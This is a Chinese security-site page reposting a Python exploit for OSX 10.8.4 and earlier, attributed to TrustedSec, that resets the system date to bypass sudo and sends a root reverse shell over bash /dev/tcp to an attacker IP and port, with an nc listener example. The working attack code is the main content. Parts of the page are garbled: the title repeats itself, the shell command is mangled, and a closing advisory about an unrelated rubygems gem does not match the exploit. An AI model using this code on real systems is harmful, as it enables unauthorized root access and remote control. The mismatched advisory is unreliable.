▶ 安全研究

安全漏洞

主页安全研究安全漏洞

OSX <= 10.8.4 - Local Root Priv Escalation (py)

2013-09-04 00:00:00

发布时间: 2013-09-04 (GMT+0800)

测试方法:

@zihuitech.com  dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
  1. #!/usr/bin/python
  3. # Original MSF Module:
  4. # https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/sudo_password_bypass.rb
  6. ###################################################################################################
  7. # Exploit Title: OSX <= 10.8.4 local root priv escalation root reverse shell<><= 10.8.4 local root priv escalation root reverse shell<>
  8. # Date: 08-27-2013
  9. # Exploit Author: David Kennedy @ TrustedSec
  10. # Website: https://www.trustedsec.com
  11. # Twitter: @Dave_ReL1K
  12. # Tested On: OSX 10.8.4
  13. #
  14. # Reference: http://www.exploit-db.com/exploits/27944/
  15. #
  16. # Example below:
  17. # trustedsec:Desktop Dave$ python osx_esc.py
  18. # [*] Exploit has been performed. You should have a shell on ipaddr: 127.0.0.1 and port 4444
  19. #
  20. # attacker_box:~ Dave$ nc -l 4444
  21. # bash: no job control in this shell
  22. # bash-3.2#
  23. ###################################################################################################
  24. import subprocess
  26. # IPADDR for REVERSE SHELL - change this to your attacker IP address
  27. ipaddr ="192.168.1.1"
  29. # PORT for REVERSE SHELL - change this to your attacker port address
  30. port ="4444"
  32. # drop into a root shell - replace 192.168.1.1 with the reverse listener
  33. proc = subprocess.Popen('bash', shell=False, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
  34. proc.stdin.write("systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo sunbash -i >& /dev/tcp/%s/%s 0>&1 &n"%(ipaddr,port))
  35. print"""
  36. ###############################################################
  37. #
  38. # OSX < 10.8.4 local root priv escalation root reverse shell<>< 10.8.4 local root priv escalation root reverse shell<>
  39. #
  40. # Written by: David Kennedy @ TrustedSec
  41. # Website: https://www.trustedsec.com
  42. # Twitter: @Dave_ReL1K
  43. #
  44. # Reference: http://www.exploit-db.com/exploits/27944/
  45. ###############################################################
  46. """
  47. print"[*] Exploit has been performed. You should have a shell on ipaddr: %s and port %s"%(ipaddr,port)

子辉安全建议:

厂商补丁:

rubygems
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

https://rubygems.org/gems/sounder